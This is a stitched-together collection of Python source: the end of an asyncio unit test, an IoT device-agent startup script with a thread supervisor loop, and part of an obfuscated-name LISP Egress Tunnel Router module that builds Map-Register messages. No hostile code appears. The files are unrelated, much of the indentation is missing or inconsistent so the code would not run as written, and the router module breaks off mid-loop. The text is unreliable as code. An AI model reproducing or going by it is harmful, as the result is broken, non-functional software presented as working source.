def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
            pass
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
        for func in (coro_func, coro_obj):
            with self.assertRaises(TypeError):
                self.loop.call_soon(func)
            with self.assertRaises(TypeError):
                self.loop.call_soon_threadsafe(func)
            with self.assertRaises(TypeError):
                self.loop.call_later(60, func)
            with self.assertRaises(TypeError):
                self.loop.call_at(self.loop.time() + 60, func)
            with self.assertRaises(TypeError):
                self.loop.run_in_executor(None, func)
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
            yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
        self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
if __name__ == '__main__':
    unittest.main()
|
run.py
|
import sys
import logging
from os import path
from os import remove
import requests
import streamingAnalytics.listener
import deviceRegistration.registrationProcess
import deviceRegistration.newDeviceRegistration
import API.authentication as auth
import API.identity
import time
import threading
import utils.settings
import dockerWatcher.sendDockerStats
import streamingAnalytics.sendModelStats
import utils.threadCommunication as communication
import deviceStatus.sendDeviceStats
import streamingAnalytics.modelSync
import paho.mqtt.publish as publish
import deviceControl.smartRest
import deviceControl.operationsListener
logger = logging.getLogger('deviceAgent')
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger.info('Logger for deviceAgent was initialised')
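# Validate the stored credentials against the tenant's /user/currentUser
# endpoint (a Cumulocity-style REST check, inferred from the API.authentication
# usage below). A non-200 response deletes the credential file so the
# registration process runs again on the next start.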
def checkUsabilityCredentials():
    logger.info('Checking if available credentials work')
url = "https://%s/user/currentUser"%(auth.get().tenant)
logger.debug('Requesting the following url: ' + str(url))
response = requests.request("GET", url, headers=auth.get().headers)
logger.debug('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Credentials valid')
return True
else:
logger.info('Deleting Credential File')
remove("./config/credentials.key")
return False
def start():
logger.info('Checking for credentials')
if not path.exists('./config/credentials.key'):
logger.info('No credentials found, starting registration')
deviceRegistration.registrationProcess.start()
logger.info('Credentials available')
logger.info('Starting checking of existing device')
if API.identity.getInternalID(utils.settings.basics()['deviceID']) is False:
logger.info('No device found in c8y, starting edge device creation.')
deviceRegistration.newDeviceRegistration.createEdgeDevice(utils.settings.basics()['deviceID'])
auth.get().internalID = API.identity.getInternalID(utils.settings.basics()['deviceID'])
utils.settings.device()
deviceControl.smartRest.checkSmartRestTemplateExists()
streamingAnalytics.modelSync.models()
logger.info('Sending internalID on MQTT for APAMA standalone')
try:
publish.single("settings/internalID", str(auth.get().internalID), hostname=utils.settings.mqtt()['broker'], port=int(utils.settings.mqtt()['port']))
    except Exception:
        logger.warning('No MQTT Broker yet available')
    logger.info('Finishing start sequence')
def operation():
logger.info('Starting operationsWatcher')
    threadOperationsWatcher = threading.Thread(target=deviceControl.operationsListener.start, daemon=True)
    threadOperationsWatcher.start()
    return threadOperationsWatcher
def listener():
logger.info('Starting listener')
threadMQTTListener = threading.Thread(target=streamingAnalytics.listener.start, daemon=True)
threadMQTTListener.start()
return threadMQTTListener
def dockerStatus():
logger.info('Starting Docker Status')
threadDockerStatus = threading.Thread(target=dockerWatcher.sendDockerStats.start, daemon=True)
threadDockerStatus.start()
return threadDockerStatus
def modelStatus():
logger.info('Starting Model Status')
threadModelStatus = threading.Thread(target=streamingAnalytics.sendModelStats.start, daemon=True)
threadModelStatus.start()
return threadModelStatus
def deviceStatsStatus():
logger.info('Starting Device Status')
threadDeviceStatus = threading.Thread(target=deviceStatus.sendDeviceStats.start, daemon=True)
threadDeviceStatus.start()
return threadDeviceStatus
if __name__ == "__main__":
try:
start()
statusDevice = deviceStatsStatus()
statusOperation = operation()
statusListener = listener()
statusDocker = dockerStatus()
statusModel = modelStatus()
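        # Supervisor loop: poll each worker thread once per second and
        # restart any daemon thread that has died; the 5-second pause before
        # each restart gives the failed dependency time to recover.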
while True:
time.sleep(1)
print("Heartbeat")
            if statusListener.is_alive() is False:
                logger.error('Listener on Measurements not alive, restarting')
                time.sleep(5)
                statusListener = listener()
            if statusOperation.is_alive() is False:
                logger.error('Listener on operations not alive, restarting')
                time.sleep(5)
                statusOperation = operation()
            if statusDocker.is_alive() is False:
                logger.error('Status on Docker not alive, restarting')
                time.sleep(5)
                statusDocker = dockerStatus()
            if statusModel.is_alive() is False:
                logger.error('Status on Model not alive, restarting')
                time.sleep(5)
                statusModel = modelStatus()
            if statusDevice.is_alive() is False:
                logger.error('Status on device update not alive, restarting')
                time.sleep(5)
                statusDevice = deviceStatsStatus()
except KeyboardInterrupt:
sys.exit(1)
except Exception as e:
        logger.error('The following error occurred: ' + str(e))
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
import lisp
import lispconfig
import socket
import select
import threading
import time
import struct
from subprocess import getoutput
import os
try :
import pytun
except :
pytun = None
Oo0o = None
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = lisp . lisp_get_ephemeral_port ( )
Ooo = None
o0oOoO00o = [ None , None , None ]
i1 = None
oOOoo00O0O = None
i1111 = None
I11 = 60
O0OoOoo00o = ( os . getenv ( "LISP_ETR_TEST_MODE" ) != None )
iiiI11 = False
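#
# Handler for the "lisp map-server" configuration command (names are
# obfuscator output). On the first configured map-server it arms a short
# Info-Request timer for NAT traversal and, when database-mappings already
# exist, schedules an immediate Map-Register; inferred from the
# lispconfig/lisp calls in the body.
#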
def OoooooOoo ( kv_pair ) :
global OOO0o0o
global Ii1iI
OoO000 = lispconfig . lisp_map_server_command ( kv_pair )
o0o00ooo0 = ( len ( lisp . lisp_map_servers_list ) == 1 )
if ( o0o00ooo0 ) :
OoO000 = list ( lisp . lisp_map_servers_list . values ( ) ) [ 0 ]
Ii1iI = threading . Timer ( 2 , oo0Oo00Oo0 ,
[ OoO000 . map_server ] )
Ii1iI . start ( )
if ( lisp . lisp_nat_traversal ) : return
if ( OoO000 and len ( lisp . lisp_db_list ) > 0 ) :
i1iiI11I ( o0oOoO00o , None , None , OoO000 , False )
if ( O0OoOoo00o and iiiI11 ) : return
if ( len ( lisp . lisp_db_list ) > 0 ) :
if ( OOO0o0o != None ) : return
OOO0o0o = threading . Timer ( 5 ,
iii11 , [ o0oOoO00o ] )
OOO0o0o . start ( )
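#
# Handler for the "lisp database-mapping" command: stores the mapping via
# lispconfig.lisp_database_mapping_command() and schedules Map-Register
# transmission, batching in test mode until an "eid-done" sentinel entry
# is seen (inferred from the body below).
#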
def oo000OO00Oo ( kv_pair ) :
global Oo0o , OOO0o0o
global o0oOoO00o , iiiI11
global lisp_seen_eid_done_count
if ( iiiI11 ) : return
lispconfig . lisp_database_mapping_command ( kv_pair , I1Ii11I1Ii1i ,
( O0OoOoo00o == False ) )
if ( lisp . lisp_nat_traversal ) : return
if ( OOO0o0o != None ) : return
if ( O0OoOoo00o ) :
o0 = len ( lisp . lisp_db_list )
if ( o0 % 1000 == 0 ) :
lisp . fprint ( "{} database-mappings processed" . format ( o0 ) )
O0oOoOO = lisp . lisp_db_list [ - 1 ]
if ( O0oOoOO . eid . is_dist_name ( ) == False ) : return
if ( O0oOoOO . eid . address != "eid-done" ) : return
iiiI11 = True
lisp . fprint ( "Finished batch of {} database-mappings" . format ( o0 ) )
Oo0ooOo0o = threading . Timer ( 0 , iii11 ,
[ o0oOoO00o ] )
Oo0o = Oo0ooOo0o
Oo0o . start ( )
return
if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
OOO0o0o = threading . Timer ( 5 ,
iii11 , [ o0oOoO00o ] )
OOO0o0o . start ( )
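#
# Builds the LISP-ETR status output: local RLOCs, decap stats, the
# configured map-server table, database-mappings, and any ELP, RLE, JSON,
# and group-mapping lists.
#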
def o0o ( clause ) :
iIIiIi1iIII1 = lispconfig . lisp_show_myrlocs ( "" )
iIIiIi1iIII1 = lispconfig . lisp_show_decap_stats ( iIIiIi1iIII1 , "ETR" )
II111iiiI1Ii = lisp . lisp_decent_dns_suffix
if ( II111iiiI1Ii == None ) :
II111iiiI1Ii = ":"
else :
II111iiiI1Ii = " (dns-suffix '{}'):" . format ( II111iiiI1Ii )
IIi1i = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
OOOO00O0O = "LISP-ETR Configured Map-Servers{}" . format ( II111iiiI1Ii )
OOOO00O0O = lisp . lisp_span ( OOOO00O0O , IIi1i )
IIi1i = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
iI1Iii = lisp . lisp_span ( "Registration<br>flags" , IIi1i )
iIIiIi1iIII1 += lispconfig . lisp_table_header ( OOOO00O0O , "Address" , "Auth-Type" ,
"xTR-ID" , "Site-ID" , iI1Iii , "Map-Registers<br>Sent" ,
"Map-Notifies<br>Received" )
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
OoO000 . resolve_dns_name ( )
IiI111111IIII = "" if OoO000 . ms_name == "all" else OoO000 . ms_name + "<br>"
i1Ii = IiI111111IIII + OoO000 . map_server . print_address_no_iid ( )
if ( OoO000 . dns_name ) : i1Ii += "<br>" + OoO000 . dns_name
I1iI1iIi111i = "0x" + lisp . lisp_hex_string ( OoO000 . xtr_id )
iiIi1IIi1I = "{}-{}-{}-{}" . format ( "P" if OoO000 . proxy_reply else "p" ,
"M" if OoO000 . merge_registrations else "m" ,
"N" if OoO000 . want_map_notify else "n" ,
"R" if OoO000 . refresh_registrations else "r" )
O0ooO0Oo00o = OoO000 . map_registers_sent + OoO000 . map_registers_multicast_sent
iIIiIi1iIII1 += lispconfig . lisp_table_row ( i1Ii ,
"sha1" if ( OoO000 . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
I1iI1iIi111i , OoO000 . site_id , iiIi1IIi1I , O0ooO0Oo00o ,
OoO000 . map_notifies_received )
iIIiIi1iIII1 += lispconfig . lisp_table_footer ( )
iIIiIi1iIII1 = lispconfig . lisp_show_db_list ( "ETR" , iIIiIi1iIII1 )
if ( len ( lisp . lisp_elp_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_elp_list ( iIIiIi1iIII1 )
if ( len ( lisp . lisp_rle_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_rle_list ( iIIiIi1iIII1 )
if ( len ( lisp . lisp_json_list ) != 0 ) :
iIIiIi1iIII1 = lispconfig . lisp_show_json_list ( iIIiIi1iIII1 )
if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
OOOO00O0O = "Configured Group Mappings:"
iIIiIi1iIII1 += lispconfig . lisp_table_header ( OOOO00O0O , "Name" , "Group Prefix" ,
"Sources" , "Use MS" )
for Ii1I1Ii in list ( lisp . lisp_group_mapping_list . values ( ) ) :
OOoO0 = ""
for OO0Oooo0oOO0O in Ii1I1Ii . sources : OOoO0 += OO0Oooo0oOO0O + ", "
if ( OOoO0 == "" ) :
OOoO0 = "*"
else :
OOoO0 = OOoO0 [ 0 : - 2 ]
iIIiIi1iIII1 += lispconfig . lisp_table_row ( Ii1I1Ii . group_name ,
Ii1I1Ii . group_prefix . print_prefix ( ) , OOoO0 , Ii1I1Ii . use_ms_name )
iIIiIi1iIII1 += lispconfig . lisp_table_footer ( )
return ( iIIiIi1iIII1 )
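#
# Show handler for the ETR's crypto-key list.
#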
def oooOo0OOOoo0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
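#
# Parses a "lisp group-mapping" command clause into a lisp_group_mapping
# entry: group name and prefix, instance-id, source list, optional RLE
# address, and the map-server name to register with.
#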
def oO0o0o0oo ( kv_pairs ) :
OOoO0 = [ ]
iI1111iiii = None
Oo0OO = None
IiI111111IIII = "all"
for iiI11ii1I1 in list ( kv_pairs . keys ( ) ) :
Ooo0OOoOoO0 = kv_pairs [ iiI11ii1I1 ]
if ( iiI11ii1I1 == "group-name" ) :
oOo0OOoO0 = Ooo0OOoOoO0
if ( iiI11ii1I1 == "group-prefix" ) :
if ( iI1111iiii == None ) :
iI1111iiii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iI1111iiii . store_prefix ( Ooo0OOoOoO0 )
if ( iiI11ii1I1 == "instance-id" ) :
if ( iI1111iiii == None ) :
iI1111iiii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iI1111iiii . instance_id = int ( Ooo0OOoOoO0 )
if ( iiI11ii1I1 == "ms-name" ) :
IiI111111IIII = Ooo0OOoOoO0 [ 0 ]
if ( iiI11ii1I1 == "address" ) :
for ooooooo00o in Ooo0OOoOoO0 :
if ( ooooooo00o != "" ) : OOoO0 . append ( ooooooo00o )
if ( iiI11ii1I1 == "rle-address" ) :
if ( Oo0OO == None ) :
Oo0OO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Oo0OO . store_address ( Ooo0OOoOoO0 )
Ii1I1Ii = lisp . lisp_group_mapping ( oOo0OOoO0 , IiI111111IIII , iI1111iiii , OOoO0 ,
Oo0OO )
Ii1I1Ii . add_group ( )
return
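#
# Encodes the EID-records and RLOC-records for one database-mapping entry
# of a Map-Register, adding RTR RLOCs when the ETR sits behind a NAT;
# returns the encoded records and their count (inferred from the body).
#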
def II1IIIIiII1i ( quiet , db , eid , group , ttl ) :
iI1i11II1i = { }
for o0o0OoOo0O0OO in db . rloc_set :
if ( o0o0OoOo0O0OO . translated_rloc . is_null ( ) ) : continue
for o0OOOooo0OOo in lisp . lisp_rtr_list :
iII1i11IIi1i = lisp . lisp_rtr_list [ o0OOOooo0OOo ]
if ( lisp . lisp_register_all_rtrs == False and iII1i11IIi1i == None ) :
lisp . lprint ( " Exclude unreachable RTR {}" . format ( lisp . red ( o0OOOooo0OOo , False ) ) )
continue
if ( iII1i11IIi1i == None ) : continue
iI1i11II1i [ o0OOOooo0OOo ] = iII1i11IIi1i
break
O00oOOooo = 0
iI1iIii11Ii = b""
for IIi1i1I11Iii in [ eid . instance_id ] + eid . iid_list :
I1i1i1 = lisp . lisp_eid_record ( )
I1i1i1 . rloc_count = len ( db . rloc_set ) + len ( iI1i11II1i )
I1i1i1 . authoritative = True
I1i1i1 . record_ttl = ttl
I1i1i1 . eid . copy_address ( eid )
I1i1i1 . eid . instance_id = IIi1i1I11Iii
I1i1i1 . eid . iid_list = [ ]
I1i1i1 . group . copy_address ( group )
iI1iIii11Ii += I1i1i1 . encode ( )
if ( not quiet ) :
I1ii1I1iiii = lisp . lisp_print_eid_tuple ( eid , group )
iiI = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
iiI = lisp . lisp_get_decent_index ( eid )
iiI = lisp . bold ( str ( iiI ) , False )
iiI = ", decent-index {}" . format ( iiI )
lisp . lprint ( " EID-prefix {} for ms-name '{}'{}" . format ( lisp . green ( I1ii1I1iiii , False ) , db . use_ms_name , iiI ) )
I1i1i1 . print_record ( " " , False )
for o0o0OoOo0O0OO in db . rloc_set :
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . store_rloc_entry ( o0o0OoOo0O0OO )
iiI1iI111ii1i . local_bit = o0o0OoOo0O0OO . rloc . is_local ( )
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
if ( not quiet ) : iiI1iI111ii1i . print_record ( " " )
for iII1i11IIi1i in list ( iI1i11II1i . values ( ) ) :
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc . copy_address ( iII1i11IIi1i )
iiI1iI111ii1i . priority = 254
iiI1iI111ii1i . rloc_name = "RTR"
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 255
iiI1iI111ii1i . mweight = 0
iiI1iI111ii1i . local_bit = False
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
if ( not quiet ) : iiI1iI111ii1i . print_record ( " RTR " )
O00oOOooo += 1
return ( iI1iIii11Ii , O00oOOooo )
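#
# Builds and sends Map-Registers for the database-mapping list. Records
# are grouped per map-server name (or per LISP-Decent DNS name), packed
# to at most 20 records or roughly 1100 bytes per message (65000 in test
# mode), and transmission is paced with a small inter-packet delay.
#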
def i1iiI11I ( lisp_sockets , ttl , eid_only , ms_only , refresh ) :
if ( eid_only != None ) :
IIii11I1i1I = 1
else :
IIii11I1i1I = lisp . lisp_db_list_length ( )
if ( IIii11I1i1I == 0 ) : return
if ( O0OoOoo00o ) :
lisp . fprint ( "Build Map-Register for {} database-mapping entries" . format ( IIii11I1i1I ) )
else :
lisp . fprint ( "Build Map-Register for {} database-mapping entries" . format ( IIii11I1i1I ) )
oOOO0oo0 = lisp . lisp_decent_pull_xtr_configured ( )
ii1 = ( IIii11I1i1I > 12 )
o0o0oOoOO0O = { }
if ( oOOO0oo0 ) :
for O0oOoOO in lisp . lisp_db_list :
i1OO0oOOoo = O0oOoOO . eid if O0oOoOO . group . is_null ( ) else O0oOoOO . group
oOOO00o000o = lisp . lisp_get_decent_dns_name ( i1OO0oOOoo )
o0o0oOoOO0O [ oOOO00o000o ] = [ ]
else :
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
if ( ms_only != None and OoO000 != ms_only ) : continue
o0o0oOoOO0O [ OoO000 . ms_name ] = [ ]
oo000 = lisp . lisp_map_register ( )
oo000 . nonce = 0xaabbccdddfdfdf00
oo000 . xtr_id_present = True
oo000 . use_ttl_for_timeout = True
if ( ttl == None ) : ttl = lisp . LISP_REGISTER_TTL
oO0oO0 = 65000 if ( O0OoOoo00o ) else 1100
for O0oOoOO in lisp . lisp_db_list :
if ( oOOO0oo0 ) :
i1i1IIIIi1i = lisp . lisp_get_decent_dns_name ( O0oOoOO . eid )
else :
i1i1IIIIi1i = O0oOoOO . use_ms_name
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
II11iI111i1 = o0o0oOoOO0O [ i1i1IIIIi1i ]
if ( II11iI111i1 == [ ] ) :
II11iI111i1 = [ b"" , 0 ]
o0o0oOoOO0O [ i1i1IIIIi1i ] . append ( II11iI111i1 )
else :
II11iI111i1 = o0o0oOoOO0O [ i1i1IIIIi1i ] [ - 1 ]
iI1iIii11Ii = b""
if ( O0oOoOO . dynamic_eid_configured ( ) ) :
for I1IIIiI1I1ii1 in list ( O0oOoOO . dynamic_eids . values ( ) ) :
i1OO0oOOoo = I1IIIiI1I1ii1 . dynamic_eid
if ( eid_only == None or eid_only . is_exact_match ( i1OO0oOOoo ) ) :
iiiI1I1iIIIi1 , O00oOOooo = II1IIIIiII1i ( ii1 , O0oOoOO ,
i1OO0oOOoo , O0oOoOO . group , ttl )
iI1iIii11Ii += iiiI1I1iIIIi1
II11iI111i1 [ 1 ] += O00oOOooo
else :
if ( eid_only == None ) :
if ( ttl != 0 ) : ttl = O0oOoOO . register_ttl
iI1iIii11Ii , O00oOOooo = II1IIIIiII1i ( ii1 , O0oOoOO ,
O0oOoOO . eid , O0oOoOO . group , ttl )
II11iI111i1 [ 1 ] += O00oOOooo
II11iI111i1 [ 0 ] += iI1iIii11Ii
if ( II11iI111i1 [ 1 ] == 20 or len ( II11iI111i1 [ 0 ] ) > oO0oO0 ) :
II11iI111i1 = [ b"" , 0 ]
o0o0oOoOO0O [ i1i1IIIIi1i ] . append ( II11iI111i1 )
oooO0o0o0O0 = .500 if ( O0OoOoo00o ) else .001
O00oOOooo = 0
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
if ( ms_only != None and OoO000 != ms_only ) : continue
i1i1IIIIi1i = OoO000 . dns_name if oOOO0oo0 else OoO000 . ms_name
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
for II11iI111i1 in o0o0oOoOO0O [ i1i1IIIIi1i ] :
oo000 . record_count = II11iI111i1 [ 1 ]
if ( oo000 . record_count == 0 ) : continue
oo000 . nonce += 1
oo000 . alg_id = OoO000 . alg_id
oo000 . key_id = OoO000 . key_id
oo000 . proxy_reply_requested = OoO000 . proxy_reply
oo000 . merge_register_requested = OoO000 . merge_registrations
oo000 . map_notify_requested = OoO000 . want_map_notify
oo000 . xtr_id = OoO000 . xtr_id
oo000 . site_id = OoO000 . site_id
oo000 . encrypt_bit = ( OoO000 . ekey != None )
if ( OoO000 . refresh_registrations ) :
oo000 . map_register_refresh = refresh
if ( OoO000 . ekey != None ) : oo000 . encryption_key_id = OoO000 . ekey_id
OooOOOOoO00OoOO = oo000 . encode ( )
oo000 . print_map_register ( )
OO000oooo0 = oo000 . encode_xtr_id ( b"" )
iI1iIii11Ii = II11iI111i1 [ 0 ]
OooOOOOoO00OoOO = OooOOOOoO00OoOO + iI1iIii11Ii + OO000oooo0
OoO000 . map_registers_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OooOOOOoO00OoOO , oo000 , OoO000 )
O00oOOooo += 1
if ( O00oOOooo % 100 == 0 and O0OoOoo00o ) :
oooO0o0o0O0 += .1
lisp . fprint ( "Sent {} Map-Registers, ipd {}" . format ( O00oOOooo ,
oooO0o0o0O0 ) )
time . sleep ( oooO0o0o0O0 )
if ( O0OoOoo00o ) :
lisp . fprint ( "Sent total {} Map-Registers" . format ( O00oOOooo ) )
OoO000 . resolve_dns_name ( )
if ( ms_only != None and OoO000 == ms_only ) : break
return
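#
# Periodic Info-Request timer used for NAT traversal: sends Info-Requests
# to the map-server and to each known RTR, then re-arms itself at
# lisp.LISP_INFO_INTERVAL.
#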
def oo0Oo00Oo0 ( ms ) :
global Ii1iI
global Oo
lisp . lisp_set_exception ( )
OO0o0oO = [ Oo , Oo , Ooo ]
lisp . lisp_build_info_requests ( OO0o0oO , ms , lisp . LISP_CTRL_PORT )
i11i11 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) == None )
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
if ( iII1i11IIi1i . is_private_address ( ) and i11i11 == False ) :
OoOoO00O0 = lisp . red ( iII1i11IIi1i . print_address_no_iid ( ) , False )
lisp . lprint ( "Skip over RTR private address {}" . format ( OoOoO00O0 ) )
continue
lisp . lisp_build_info_requests ( OO0o0oO , iII1i11IIi1i , lisp . LISP_DATA_PORT )
Ii1iI . cancel ( )
Ii1iI = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oo0Oo00Oo0 , [ None ] )
Ii1iI . start ( )
return
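#
# Periodic re-registration timer: resends Map-Registers for the full
# database-mapping list (plus the L2-overlay broadcast entry when
# configured), then re-arms itself at the 60-second interval defined
# above.
#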
def iii11 ( lisp_sockets ) :
global Oo0o , OOO0o0o
global Oo
lisp . lisp_set_exception ( )
i1iiI11I ( lisp_sockets , None , None , None , True )
if ( lisp . lisp_l2_overlay ) :
OOOooo0OooOoO = [ None , "ffff-ffff-ffff" , True ]
oOoOOOo ( lisp_sockets , [ OOOooo0OooOoO ] )
if ( OOO0o0o != None ) :
OOO0o0o . cancel ( )
OOO0o0o = None
if ( Oo0o ) : Oo0o . cancel ( )
Oo0o = threading . Timer ( I11 ,
iii11 , [ o0oOoO00o ] )
Oo0o . start ( )
return
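#
# Builds multicast Map-Registers from (source, group, join/leave) entries,
# typically produced by the IGMP handler below: one (S,G) EID-record per
# entry, carrying an RLE RLOC plus any RTR RLOCs.
#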
def oOoOOOo ( lisp_sockets , entries ) :
iiIii1IIi = len ( entries )
if ( iiIii1IIi == 0 ) : return
i111IIIiI = None
if ( entries [ 0 ] [ 1 ] . find ( ":" ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_IPV6
if ( entries [ 0 ] [ 1 ] . find ( "." ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_IPV4
if ( entries [ 0 ] [ 1 ] . find ( "-" ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_MAC
if ( i111IIIiI == None ) :
lisp . lprint ( "lisp_send_multicast_map_register() invalid group address" )
return
iIiiiiii1 = [ ]
for ooooooo00o , oOO0oo , II1iIi1IiIii in entries :
iIiiiiii1 . append ( [ oOO0oo , II1iIi1IiIii ] )
oOOO0oo0 = lisp . lisp_decent_pull_xtr_configured ( )
o0o0oOoOO0O = { }
entries = [ ]
for oOO0oo , II1iIi1IiIii in iIiiiiii1 :
ii111Ii11iii = lisp . lisp_lookup_group ( oOO0oo )
if ( ii111Ii11iii == None ) :
lisp . lprint ( "No group-mapping for {}, could be underlay group" . format ( oOO0oo ) )
continue
lisp . lprint ( "Use group-mapping '{}' {} for group {}" . format ( ii111Ii11iii . group_name , ii111Ii11iii . group_prefix . print_prefix ( ) , oOO0oo ) )
IIi1i1I11Iii = ii111Ii11iii . group_prefix . instance_id
IiI111111IIII = ii111Ii11iii . use_ms_name
oo0O0oo = ii111Ii11iii . rle_address
iii1III1i = IiI111111IIII
if ( oOOO0oo0 ) :
iii1III1i = lisp . lisp_get_decent_dns_name_from_str ( IIi1i1I11Iii , oOO0oo )
o0o0oOoOO0O [ iii1III1i ] = [ b"" , 0 ]
if ( len ( ii111Ii11iii . sources ) == 0 ) :
entries . append ( [ "0.0.0.0" , oOO0oo , IIi1i1I11Iii , iii1III1i , oo0O0oo , II1iIi1IiIii ] )
continue
for OO0Oooo0oOO0O in ii111Ii11iii . sources :
o0o0oOoOO0O [ iii1III1i ] = [ b"" , 0 ]
entries . append ( [ OO0Oooo0oOO0O , oOO0oo , IIi1i1I11Iii , iii1III1i , oo0O0oo , II1iIi1IiIii ] )
iiIii1IIi = len ( entries )
if ( iiIii1IIi == 0 ) : return
lisp . lprint ( "Build Map-Register for {} multicast entries" . format ( iiIii1IIi ) )
oOO = lisp . lisp_rle_node ( )
oOO . level = 128
II1i11i1iIi11 = lisp . lisp_get_any_translated_rloc ( )
oo0O0oo = lisp . lisp_rle ( "" )
oo0O0oo . rle_nodes . append ( oOO )
if ( oOOO0oo0 == False ) :
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
o0o0oOoOO0O [ OoO000 . ms_name ] = [ b"" , 0 ]
iIIi1iiI1i11 = None
if ( lisp . lisp_nat_traversal ) : iIIi1iiI1i11 = lisp . lisp_hostname
I1 = 0
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
I1 += 1
iI1iIii11Ii = b""
for ooooooo00o , oOO0oo , IIi1i1I11Iii , i1i1IIIIi1i , i1I , II1iIi1IiIii in entries :
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
I1i1i1 = lisp . lisp_eid_record ( )
I1i1i1 . rloc_count = 1 + I1
I1i1i1 . authoritative = True
I1i1i1 . record_ttl = lisp . LISP_REGISTER_TTL if II1iIi1IiIii else 0
I1i1i1 . eid = lisp . lisp_address ( i111IIIiI , ooooooo00o , 0 , IIi1i1I11Iii )
if ( I1i1i1 . eid . address == 0 ) : I1i1i1 . eid . mask_len = 0
I1i1i1 . group = lisp . lisp_address ( i111IIIiI , oOO0oo , 0 , IIi1i1I11Iii )
if ( I1i1i1 . group . is_mac_broadcast ( ) and I1i1i1 . eid . address == 0 ) : I1i1i1 . eid . mask_len = 0
iiI = ""
IiI111111IIII = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
iiI = lisp . lisp_get_decent_index ( I1i1i1 . group )
iiI = lisp . bold ( str ( iiI ) , False )
iiI = "with decent-index {}" . format ( iiI )
else :
iiI = "for ms-name '{}'" . format ( i1i1IIIIi1i )
iIIIIiiIii = lisp . green ( I1i1i1 . print_eid_tuple ( ) , False )
lisp . lprint ( " EID-prefix {} {}{}" . format ( iIIIIiiIii , IiI111111IIII ,
iiI ) )
iI1iIii11Ii += I1i1i1 . encode ( )
I1i1i1 . print_record ( " " , False )
o0o0oOoOO0O [ i1i1IIIIi1i ] [ 1 ] += 1
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc_name = iIIi1iiI1i11
if ( II1i11i1iIi11 != None ) :
oOO . address = II1i11i1iIi11
elif ( i1I != None ) :
oOO . address = i1I
else :
oOO . address = i1I = lisp . lisp_myrlocs [ 0 ]
iiI1iI111ii1i . rle = oo0O0oo
iiI1iI111ii1i . local_bit = True
iiI1iI111ii1i . reach_bit = True
iiI1iI111ii1i . priority = 255
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 1
iiI1iI111ii1i . mweight = 100
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
iiI1iI111ii1i . print_record ( " " )
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
